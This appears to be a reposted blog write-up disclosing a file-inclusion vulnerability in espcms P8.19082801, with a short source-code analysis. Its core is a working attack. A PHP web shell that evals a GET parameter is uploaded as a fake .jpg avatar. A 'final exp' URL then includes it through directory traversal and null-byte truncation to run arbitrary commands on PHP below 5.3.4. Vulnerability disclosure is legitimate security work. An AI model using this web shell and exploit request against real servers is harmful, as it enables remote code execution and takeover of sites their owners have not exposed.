espcms P8.19082801 vulnerability
作者:互联网
author: naiquan chai
Net name:Hanamizuki花水木
Through the vulnerability we can get the webshell if we have enough privilege.
Affected by this vulnerability requires server-side php version <5.3.4
Demo
First enter the user module,then modify the user's avatar.Upload a file with the suffix jpg and the editorial content is
<?php
class test{
public static function in_test(){
eval($_GET['a']);
}
}
?>
Upload success.We can get the path from the Web page source code.
Then go to the main page and pass in
"index.php?ac=../upload/photo/userphoto_c4ca4238a0b923820dcc509a6f75849b.jpg%00&at=test&a=echo 1;"
We find that the page echo 1.
Source code analysis
espcms_web/espcms_load.php:
We can find that through ac parameters we can include files, and at parameters can execute methods.
Tracking function espcms_get_ac() and function espcms_get_at():
We can see that the function does not filter user input at all,so ac parameter can facilitate the directory,this results in arbitrary file inclusion.
However,through the file espcms_web/espcms_load.php, we find that the ac parameter is automatically followed by a .php suffix.
We can use truncation vulnerabilities to bypass it,this requires PHP version < 5.3.4
Final exp
index.php?ac=../upload/photo/userphoto_c4ca4238a0b923820dcc509a6f75849b.jpg%00&at=test&a=echo 1;
标签:function,ac,get,vulnerability,espcms,test,php,P8.19082801 来源: https://www.cnblogs.com/cimuhuashuimu/p/11526726.html